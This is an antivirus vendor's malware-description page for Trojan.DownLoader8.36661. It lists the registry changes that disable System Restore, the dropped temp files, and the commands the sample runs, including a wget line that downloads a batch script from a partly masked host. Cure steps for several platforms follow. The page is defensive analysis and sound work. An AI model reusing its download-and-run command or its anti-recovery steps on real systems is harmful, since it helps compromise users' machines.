Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.DownLoader8.36661

Добавлен в вирусную базу Dr.Web: 2013-04-08

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\sr] 'Start' = '00000000'
  • [<HKLM>\SYSTEM\ControlSet001\Services\srservice] 'Start' = '00000002'
Вредоносные функции:
Для затруднения выявления своего присутствия в системе
блокирует:
  • Компонент восстановления системы (SR)
Создает и запускает на исполнение:
  • %TEMP%\PEVZ.EXE MOVEEX "%TEMP%\zoek.com"
  • %TEMP%\PEVZ.EXE PLIST
  • %TEMP%\wget.exe http://www.hi###kthis.nl/smeenk/sample/download3.bat
Запускает на исполнение:
  • <SYSTEM32>\cscript.exe //I //nologo os.vbs
  • <SYSTEM32>\find.exe /i "x86"
  • <SYSTEM32>\mshta.exe "%TEMP%\zoek.hta"
  • <SYSTEM32>\cscript.exe //I //nologo drt.vbs
  • <SYSTEM32>\reg.exe Query HKLM\Hardware\Description\System\CentralProcessor\0
  • <SYSTEM32>\findstr.exe -RIV "C:\\WINDOWS\\system32\\svchost.exe C:\\WINDOWS\\system32\\cmd.exe \\PEVZ.exe" ProcessList.txt
  • <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\zoek-install.bat" "
  • <SYSTEM32>\findstr.exe /M /I "4.0.0.2"
  • <SYSTEM32>\findstr.exe /M /I "mshta.exe"
Изменения в файловой системе:
Создает следующие файлы:
  • %TEMP%\hijackthis.exe
  • %TEMP%\7za.exe
  • %TEMP%\shortcut.exe
  • %TEMP%\logje.txt
  • %TEMP%\ProcessList.txt
  • %TEMP%\swxcacls.exe
  • %TEMP%\zoekrun.hta
  • %TEMP%\remove.exe
  • %TEMP%\zoek-delete.exe
  • %TEMP%\sed.exe
  • %TEMP%\NirCmd.exe
  • %TEMP%\ostmp.tmp
  • %TEMP%\os.vbs
  • %TEMP%\tmp1.txt
  • %TEMP%\0.zoek
  • %TEMP%\drt.vbs
  • %TEMP%\StringCheck.txt
  • %TEMP%\log2
  • %TEMP%\log3
  • %TEMP%\log.txt
  • %TEMP%\checkOS.txt
  • %TEMP%\tmp.txt
  • %TEMP%\wget.exe
  • %TEMP%\1.tmp\z6.scf
  • %TEMP%\1.tmp\z5.scf
  • %TEMP%\1.tmp\z7.scf
  • %TEMP%\1.tmp\z9.scf
  • %TEMP%\1.tmp\z8.scf
  • %TEMP%\1.tmp\z4.scf
  • %TEMP%\1.tmp\z0.scf
  • %TEMP%\1.tmp\zoek-install.bat
  • %TEMP%\1.tmp\z1.scf
  • %TEMP%\1.tmp\z3.scf
  • %TEMP%\1.tmp\z2.scf
  • %TEMP%\zoek.hta
  • %TEMP%\1.tmp\log.txt
  • %TEMP%\zoek.bat
  • %TEMP%\PEVZ.EXE
  • %TEMP%\swreg.exe
  • %TEMP%\urlzoek
  • %TEMP%\1.tmp\zb.scf
  • %TEMP%\1.tmp\za.scf
  • %TEMP%\1.tmp\zc.scf
  • %TEMP%\1.tmp\ze.scf
  • %TEMP%\1.tmp\zd.scf
Удаляет следующие файлы:
  • %TEMP%\logje.txt
  • %TEMP%\log2
  • %TEMP%\log3
  • %TEMP%\1.tmp\ze.scf
  • %TEMP%\1.tmp\log.txt
  • %TEMP%\ProcessList.txt
  • %TEMP%\tmp.txt
  • %TEMP%\tmp1.txt
  • %TEMP%\drt.vbs
  • %TEMP%\ostmp.tmp
  • %TEMP%\StringCheck.txt
  • %TEMP%\checkOS.txt
  • %TEMP%\os.vbs
  • %TEMP%\1.tmp\zd.scf
  • %TEMP%\1.tmp\z3.scf
  • %TEMP%\1.tmp\z4.scf
  • %TEMP%\1.tmp\z5.scf
  • %TEMP%\1.tmp\z0.scf
  • %TEMP%\1.tmp\z1.scf
  • %TEMP%\1.tmp\z2.scf
  • %TEMP%\1.tmp\z6.scf
  • %TEMP%\1.tmp\za.scf
  • %TEMP%\1.tmp\zb.scf
  • %TEMP%\1.tmp\zc.scf
  • %TEMP%\1.tmp\z7.scf
  • %TEMP%\1.tmp\z8.scf
  • %TEMP%\1.tmp\z9.scf
Сетевая активность:
Подключается к:
  • 'www.hi###kthis.nl':80
TCP:
Запросы HTTP GET:
  • www.hi###kthis.nl/smeenk/sample/download3.bat
UDP:
  • DNS ASK www.hi###kthis.nl
Другое:
Ищет следующие окна:
  • ClassName: 'Shell_TrayWnd' WindowName: ''
  • ClassName: 'HTML Application Host Window Class' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке